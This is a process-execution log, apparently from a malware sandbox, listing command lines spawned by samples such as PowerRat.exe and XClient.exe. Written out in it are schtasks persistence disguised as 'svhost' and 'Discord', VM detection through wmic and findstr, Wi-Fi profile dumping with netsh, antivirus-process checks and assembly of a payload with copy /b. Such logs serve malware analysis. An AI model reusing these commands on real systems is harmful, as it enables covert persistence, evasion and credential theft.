"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fg8OiSm2W9aH.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\srtware.exe
"C:\Users\Admin\Desktop\Files\srtware.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2060 -ip 2060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 84
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0gCc6gLqbZ4p.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OSFpz9bh9GZK.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgDm2GH1LKVy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgDm2GH1LKVy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 2408 -ip 2408
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2408 -s 312
C:\Users\Admin\Desktop\Files\Pichon.exe
"C:\Users\Admin\Desktop\Files\Pichon.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LkORHBv6MEkT.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Users\Admin\Desktop\Files\TCP.exe
"C:\Users\Admin\Desktop\Files\TCP.exe"
C:\Users\Admin\Desktop\Files\c3.exe
"C:\Users\Admin\Desktop\Files\c3.exe"
C:\Users\Admin\Desktop\Files\winlog32.exe
"C:\Users\Admin\Desktop\Files\winlog32.exe"
C:\Users\Admin\Desktop\Files\TPB-1.exe
"C:\Users\Admin\Desktop\Files\TPB-1.exe"
C:\Users\Admin\Desktop\Files\TPB-1.exe
"C:\Users\Admin\Desktop\Files\TPB-1.exe"
C:\Users\Admin\Desktop\Files\TPB-1.exe
"C:\Users\Admin\Desktop\Files\TPB-1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5332 -ip 5332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 860
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rYhDRPD5vi3w.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 552 -p 3144 -ip 3144
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3144 -s 344
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Loli169.bat
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 632 -p 5260 -ip 5260
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5260 -s 352
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hY3WriDIaW8q.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QqQGkUhifzGh.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OGro20IwsaQZ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Users\Admin\Desktop\Files\MajesticExec.exe
"C:\Users\Admin\Desktop\Files\MajesticExec.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q52y8mMUPLgh.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\qNVQKFyM.exe
"C:\Users\Admin\Desktop\Files\qNVQKFyM.exe"
C:\Users\Admin\Desktop\Files\svc.exe
"C:\Users\Admin\Desktop\Files\svc.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d4V2EwdrqlEs.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eDlbxk1R5dLM.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fnaDQMRBOCPz.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9YDL858ngq4B.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\Loli169.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9YDL858ngq4B.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TuGrPuBdKTPZ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TuGrPuBdKTPZ.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IrF6CLU8JxbY.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\random.exe
"C:\Users\Admin\Desktop\Files\random.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\Desktop\Files\sam.exe
"C:\Users\Admin\Desktop\Files\sam.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CbU7OfKCtes6.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\PowerRat.exe
"C:\Users\Admin\Desktop\Files\PowerRat.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\DllHost.exe
"C:\Windows\system32\DllHost.exe" /Processid:{9F156763-7844-4DC4-B2B1-901F640F5155}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iGrTS9ZFWksk.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\nobody.exe
"C:\Users\Admin\Desktop\Files\nobody.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\Desktop\Files\bnkrigkawd.exe
"C:\Users\Admin\Desktop\Files\bnkrigkawd.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\Desktop\Files\99awhy8l.exe
"C:\Users\Admin\Desktop\Files\99awhy8l.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEnGm3FHatpx.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 578678
C:\Windows\SysWOW64\findstr.exe
findstr /V "PEACEFOLKSEXUALISLANDS" Hill
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif
Cooper.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe
"C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe"
C:\Users\Admin\Desktop\Files\XM.exe
"C:\Users\Admin\Desktop\Files\XM.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\Desktop\Files\xxx.exe
"C:\Users\Admin\Desktop\Files\xxx.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZYRYbhs6JAqJ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe
